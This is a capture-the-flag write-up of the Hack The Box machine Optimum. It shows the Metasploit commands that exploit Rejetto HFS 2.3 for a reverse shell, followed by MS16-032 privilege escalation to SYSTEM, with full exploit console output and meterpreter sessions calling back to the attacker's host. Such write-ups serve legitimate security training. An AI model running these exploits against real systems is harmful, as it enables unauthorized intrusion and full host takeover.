HTB Writeup - Optimum
Enumeration
We start with an nmap scan:
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
And there is only 1 port open and it’s port 80 running Rejetto HFS version 2.3 which is a file share. If you do the course work for the eJPT exam, you’ll recognize this service as it’s used in many lab scenarios for training.
Exploiting HFS
HFS version 2.3 is very simple to exploit. There is a Metasploit module available for this and all it needs is the target to be set for it to work:
use windows/http/rejetto_hfs_exec
set RHOSTS <target>
set LHOST tun0
run
Exploiting this gives us a shell on the machine as the kostas user.
Privilege Escalation
It took me a while to work out how to privilege escalate on this machine. I was expecting something like stored credentials, etc, that would allow me to upgrade to the administrator.
I ran WinPEASS and identified a few exploits to try, one of which was Metasploit’s windows/local/ms16_032_secondary_logon_handle_privesc. Setting the session to the other active meterpreter session and running it was successful.
[*] Started reverse TCP handler on 10.10.14.55:4455
[+] Compressed size: 1160
[!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell
[*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\ArapGh.ps1...
[*] Compressing script contents...
[+] Compressed size: 3743
[*] Executing exploit script...
__ __ ___ ___ ___ ___ ___ ___
| V | _|_ | | _|___| |_ |_ |
| |_ |_| |_| . |___| | |_ | _|
|_|_|_|___|_____|___| |___|___|___|
[by b33f -> @FuzzySec]
[?] Operating system core count: 2
[>] Duplicating CreateProcessWithLogonW handle
[?] Done, using thread handle: 2352
[*] Sniffing out privileged impersonation token..
[?] Thread belongs to: svchost
[+] Thread suspended
[>] Wiping current impersonation token
[>] Building SYSTEM impersonation token
[ref] cannot be applied to a variable that does not exist.
At line:200 char:3
+ $tt2m = [Ntdll]::NtImpersonateThread($kIsKw, $kIsKw, [ref]$mMs2W)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (mMs2W:VariablePath) [], Runti
meException
+ FullyQualifiedErrorId : NonExistingVariableReference
[!] NtImpersonateThread failed, exiting..
[+] Thread resumed!
[*] Sniffing out SYSTEM shell..
[>] Duplicating SYSTEM token
Cannot convert argument "ExistingTokenHandle", with value: "", for "DuplicateTo
ken" to type "System.IntPtr": "Cannot convert null to type "System.IntPtr"."
At line:259 char:2
+ $tt2m = [Advapi32]::DuplicateToken($do0i, 2, [ref]$vW)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodException
+ FullyQualifiedErrorId : MethodArgumentConversionInvalidCastArgument
[>] Starting token race
[>] Starting process race
[!] Holy handle leak Batman, we have a SYSTEM shell!!
m4cBn3bQLPZAmuyzkrhiKlgKfv3DPjHo
[+] Executed on target machine.
[*] Sending stage (176198 bytes) to 10.129.79.42
[*] Meterpreter session 3 opened (10.10.14.55:4455 -> 10.129.79.42:49164) at 2024-07-28 17:44:30 +1000
[+] Deleted C:\Users\kostas\AppData\Local\Temp\ArapGh.ps1
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows Server 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 3
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
We end up with an Administrator shell and have succeeded in compromising the host.
I’m not certain how to best identify this exploit in the future besides Googling the version of the operating system. Microsoft’s bulletin, https://learn.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-032, shows the affected versions.